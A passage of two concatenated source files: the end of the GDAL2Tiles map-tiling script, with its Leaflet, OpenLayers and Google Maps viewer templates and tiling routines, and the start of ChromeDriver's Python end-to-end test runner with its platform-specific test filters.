var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity for whole overlay is then not changeable, either or...
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlon'] = (args['north'] + args['south']) / 2.
args['centerlat'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tilesize'] = self.tilesize # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/leaflet/1.3.4/leaflet.css" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/leaflet/1.3.4/leaflet.js"></script>
<!-- Ajax -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
var map = L.map('map').setView([%(centerlon)s, %(centerlat)s], %(beginzoom)s);
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png', {maxZoom: 20, attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors'});
// .. Thaichote by GISTDA
var theos = L.tileLayer('http://go-tiles1.gistda.or.th/mapproxy/wmts/thaichote/GLOBAL_WEBMERCATOR/{z}/{x}/{y}.png', {maxZoom: 20, attribution: '© <a href = "http://www.gistda.or.th">GISTDA</a>'});
// .. Google Hybrid
var ghyb = L.tileLayer('https://mt1.google.com/vt/lyrs=y&x={x}&y={y}&z={z}', {maxZoom: 20, attribution: '© <a href = "#">Google</a>'});
// .. OSM Toner
//var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {maxZoom: 20, attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.'});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==");
// Overlay layers (TMS) and XYZ
// Use TMS = tms: ture OR Use XYZ = tms: false
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {maxZoom: 22, tms: false, opacity: 0.9, attribution: "%(copyright)s"}).addTo(map);
// Map
/*
var map = L.map('map', {
center: [%(centerlon)s, %(centerlat)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
*/
var basemaps = {"OpenStreetMap": osm, "Thaichote by GISTDA": theos, "Google Hybrid": ghyb, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2018 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> & <a href="http://www.cgistln.nu.ac.th/">GISTNU</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
//map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html implementing overlay of available Spherical Mercator layers.
It returns filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = "-1"
else:
args['tmsoffset'] = ""
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz+1
args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" % args # noqa
if self.options.profile == 'mercator':
s += """
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>
""" % args
s += """
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" % args
if self.options.profile == 'mercator':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:3857",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
""" % args # noqa
if self.options.xyz:
s += """
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.XYZ("XYZ Overlay",
"${z}/${x}/${y}.png", {
transitionEffect: 'resize',
isBaseLayer: false
});
""" % args # noqa
else:
s += """
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
""" % args # noqa
s += """
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds);
""" % args # noqa
elif self.options.profile == 'raster':
s += """
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent(mapBounds);
""" % args # noqa
s += """
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" % args
if self.options.profile == 'mercator' and self.options.xyz is None:
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'raster':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
s += """
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" % args # noqa
return s
@staticmethod
def getYtile(ty, tz, options):
"""
Calculates the y-tile number based on whether XYZ or TMS (default) system is used
:param ty: The y-tile number
:return: The transformed tile number
"""
if options.xyz:
return (2**tz - 1) - ty # Convert from TMS to XYZ numbering system
else:
return ty
def worker_tile_details(input_file, output_folder, options, send_pipe=None):
try:
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return_data = (tile_job_info, tile_details)
if send_pipe:
send_pipe.send(return_data)
return return_data
except Exception as e:
print("worker_tile_details failed ", str(e))
def progress_printer_thread(queue, nb_jobs):
pb = ProgressBar(nb_jobs)
pb.start()
for _ in range(nb_jobs):
queue.get()
pb.log_progress()
queue.task_done()
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tilesize * pixelsizex
east = west + tile_job_info.tilesize * pixelsizex
south = tile_job_info.ominy + y * tile_job_info.tilesize * pixelsizex
north = south + tile_job_info.tilesize * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single threaded version that stays clear of multiprocessing, for platforms that would not
support it
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail, options)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
(conf_receiver, conf_sender) = Pipe(False)
if options.verbose:
print("Begin tiles details calc")
p = Process(target=worker_tile_details,
args=[input_file, output_folder, options],
kwargs={"send_pipe": conf_sender})
p.start()
# Make sure to consume the queue before joining. If the payload is too big, it won't be put in
# one go in the queue and therefore the sending process will never finish, waiting for space in
# the queue to send data
conf, tile_details = conf_receiver.recv()
p.join()
if options.verbose:
print("Tiles details calc complete.")
# Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
# otherwise you can't pass it as a param in the method invoked by the pool...
manager = Manager()
queue = manager.Queue()
pool = Pool(processes=nb_processes)
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
# TODO: gbataille - check memory footprint and time on big image. are they opened x times
for tile_detail in tile_details:
pool.apply_async(create_base_tile, (conf, tile_detail, options), {"queue": queue})
if not options.verbose and not options.quiet:
p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
p.start()
pool.close()
pool.join() # Jobs finished
if not options.verbose and not options.quiet:
p.join() # Traces done
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main():
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
argv = gdal.GeneralCmdLineProcessor(sys.argv)
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
if __name__ == '__main__':
# start_time = time.time()
main()
# print("--- %s seconds ---" % (time.time() - start_time))
|
run_py_tests.py
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""End to end tests for ChromeDriver."""
import base64
import json
import math
import optparse
import os
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import urllib2
import shutil
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'client'))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'server'))
import chrome_paths
import chromedriver
import unittest_util
import util
import server
from webelement import WebElement
import webserver
_TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver')
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
from pylib import android_commands
from pylib import constants
from pylib import forwarder
from pylib import valgrind_tools
from pylib.device import device_utils
_NEGATIVE_FILTER = [
# https://code.google.com/p/chromedriver/issues/detail?id=213
'ChromeDriverTest.testClickElementInSubFrame',
# This test is flaky since it uses setTimeout.
# Re-enable once crbug.com/177511 is fixed and we can remove setTimeout.
'ChromeDriverTest.testAlert',
]
_VERSION_SPECIFIC_FILTER = {}
_VERSION_SPECIFIC_FILTER['HEAD'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=992
'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences',
]
_VERSION_SPECIFIC_FILTER['37'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_VERSION_SPECIFIC_FILTER['36'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_OS_SPECIFIC_FILTER = {}
_OS_SPECIFIC_FILTER['win'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=214
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=299
'ChromeLogPathCapabilityTest.testChromeLogPath',
]
_OS_SPECIFIC_FILTER['linux'] = [
# Xvfb doesn't support maximization.
'ChromeDriverTest.testWindowMaximize',
# https://code.google.com/p/chromedriver/issues/detail?id=302
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
]
_OS_SPECIFIC_FILTER['mac'] = [
]
_DESKTOP_NEGATIVE_FILTER = [
# Desktop doesn't support touch (without --touch-events).
'ChromeDriverTest.testSingleTapElement',
'ChromeDriverTest.testTouchDownUpElement',
'ChromeDriverTest.testTouchFlickElement',
'ChromeDriverTest.testTouchMovedElement',
'ChromeDriverAndroidTest.*',
]
def _GetDesktopNegativeFilter(version_name):
filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
os = util.GetPlatformName()
if os in _OS_SPECIFIC_FILTER:
filter += _OS_SPECIFIC_FILTER[os]
if version_name in _VERSION_SPECIFIC_FILTER:
filter += _VERSION_SPECIFIC_FILTER[version_name]
return filter
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
_NEGATIVE_FILTER + [
# TODO(chrisgao): fix hang of tab crash test on android.
'ChromeDriverTest.testTabCrash',
# Android doesn't support switches and extensions.
'ChromeSwitchesCapabilityTest.*',
'ChromeExtensionsCapabilityTest.*',
'MobileEmulationCapabilityTest.*',
'ChromeDownloadDirTest.*',
# https://crbug.com/274650
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=270
'ChromeDriverTest.testPopups',
# https://code.google.com/p/chromedriver/issues/detail?id=298
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
'ChromeDriverTest.testWindowMaximize',
'ChromeLogPathCapabilityTest.testChromeLogPath',
'RemoteBrowserTest.*',
# Don't enable perf testing on Android yet.
'PerfTest.testSessionStartTime',
'PerfTest.testSessionStopTime',
'PerfTest.testColdExecuteScript',
# https://code.google.com/p/chromedriver/issues/detail?id=459
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
# Android doesn't support multiple sessions on one device.
'SessionHandlingTest.testGetSessions',
]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# ChromeShell doesn't support multiple tabs.
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testSwitchToWindow',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
]
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome_shell'] + [
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverSendLargeData',
'PerformanceLoggerTest.testPerformanceLogger',
]
)
class ChromeDriverBaseTest(unittest.TestCase):
"""Base class for testing chromedriver functionalities."""
def __init__(self, *args, **kwargs):
super(ChromeDriverBaseTest, self).__init__(*args, **kwargs)
self._drivers = []
def tearDown(self):
for driver in self._drivers:
try:
driver.Quit()
except:
pass
def CreateDriver(self, server_url=None, download_dir=None, **kwargs):
if server_url is None:
server_url = _CHROMEDRIVER_SERVER_URL
android_package = None
android_activity = None
android_process = None
if _ANDROID_PACKAGE_KEY:
android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package
if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell':
android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity
android_process = '%s:main' % android_package
driver = chromedriver.ChromeDriver(server_url,
chrome_binary=_CHROME_BINARY,
android_package=android_package,
android_activity=android_activity,
android_process=android_process,
download_dir=download_dir,
**kwargs)
self._drivers += [driver]
return driver
class ChromeDriverTest(ChromeDriverBaseTest):
"""End to end tests for ChromeDriver."""
@staticmethod
def GlobalSetUp():
ChromeDriverTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
ChromeDriverTest._sync_server = webserver.SyncWebServer()
if _ANDROID_PACKAGE_KEY:
ChromeDriverTest._device = device_utils.DeviceUtils(
android_commands.GetAttachedDevices()[0])
http_host_port = ChromeDriverTest._http_server._server.server_port
sync_host_port = ChromeDriverTest._sync_server._server.server_port
forwarder.Forwarder.Map(
[(http_host_port, http_host_port), (sync_host_port, sync_host_port)],
